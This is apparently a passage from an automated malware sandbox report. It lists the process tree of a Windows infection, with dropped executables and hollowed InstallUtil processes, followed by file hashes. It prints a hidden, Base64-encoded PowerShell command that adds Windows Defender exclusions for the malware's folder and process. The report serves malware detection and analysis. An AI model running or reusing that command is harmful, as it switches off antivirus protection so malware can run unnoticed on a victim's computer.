C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73AC7C45C0CF6A5E20EAE9DA9193AB63 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2060
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3261FE8E9A19406519F4ABADEEF0918A --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4584
-
C:\Users\Admin\AppData\Roaming\yagacrypt.exe"C:\Users\Admin\AppData\Roaming\yagacrypt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Users\Admin\AppData\Roaming\yagacrypt.exeC:\Users\Admin\AppData\Roaming\yagacrypt.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exeC:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152 -
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exeC:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe2⤵
- Executes dropped EXE
PID:3648 -
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exeC:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
C:\Users\Admin\AppData\Local\Temp\ggiac.exeC:\Users\Admin\AppData\Local\Temp\ggiac.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\ggiac.exeC:\Users\Admin\AppData\Local\Temp\ggiac.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3460
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
16KB
MD5d9978a7bc703072527518ec65490fabb
SHA14cfc423812a29a857dd4d7db38bb648be228df30
SHA256edfc6d7d35c07e5cd1f9fa65b8c4861adaa39ef7091fe14c51b87a1d4932e5e5
SHA512c3f248557d1c35f1d7ec5a96fbf784e52110fecaefcb82001426b996b58e43154e57c37484b3be974efac8e7b494d69a755808910af3e10fd82edc15a0ee6222
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5c3941d9fa38f1717d5cecd7a2ca71667
SHA133b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA51298f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45
-
Filesize
18KB
MD5569124b0982577268dcbc9070e76fea0
SHA1149910730a6bc3a691d8df4dafb3cc12fd625496
SHA256b3f8175d4f6cb09f6d2f912e1bf6d31caeaa5aa16abb84831051c883f16e7ec1
SHA512fb34ef6fc5f61a16112e1fb1223f07a9d309e7871638d8792435e56ca4a8201b953d51047d264505bdd420898602d96419380f0ad0b68ae474c0b4a583ffaf95
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
234B
MD5ae0f7fab163139c661e576fe0af08651
SHA17545ab94360fd93f2209021b4cecabb92592be27
SHA256832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
86KB
MD5f3ed43acd7d035e8c6035c7d65ec60bf
SHA1679c01b051cbd42b740a05f0cd2807b16bae5aec
SHA256136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef
SHA512fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5
-
Filesize
19KB
MD5ac6f4727f46bff3bd3f71550ae96c15f
SHA15966b42c1989bf6886c887a29480bd8a249476ee
SHA256580b5d3ab9575c944f5f15f42fe82a5024411a68f759ee7137e0403ac2b568e0
SHA512734a98dd5dad4674bd56b6138a94580be819c77ec3945901053b6c9f9a8bd34f4975f3a71b363ca257bfe0187cebe52bbb65fc262cb59f923396f5c2cebe737a
-
Filesize
56KB
MD50abd42634db4f4fb3bbbcaa066413d68
SHA1074f62ae3b24d775f09e98e81e857e6f1be05f3b
SHA256a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4
SHA512578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2
-
Filesize
54KB
MD5d9c253eaa73b4a33b91def3e863d644e
SHA1626c26f275e691183fa48b68daf586e24960cc3e
SHA25645474eaa30615f25da4e0f31447222de844cfea4375eaff3a6d9adf19101e654
SHA5125041ca9cce11cc44a11525eac5944a5fd21652b53794f4c2eb656f33d7d2e8cf2bd7ee25304a829578e57869b77d36c624059108ab8f018ef85ab673efc391c7
-
Filesize
6KB
MD5220f7a6283256dfda65a5879cb7d8afc
SHA1b640bc6f963b8cdc8104fb8f99ca7b3a34a510b0
SHA256bac0966abfbc560de0f8802564fc5bc95e8492f838b394404641183a27c30b37
SHA512e7e88895d26431f84c71b69c27b2549f7ecc5b2e473c3dc3c4f3bf52439d98d6e01e3640d142b8d0fe0a3e9da1b1efcd8b6a3233d86848ad53787e6c73014f89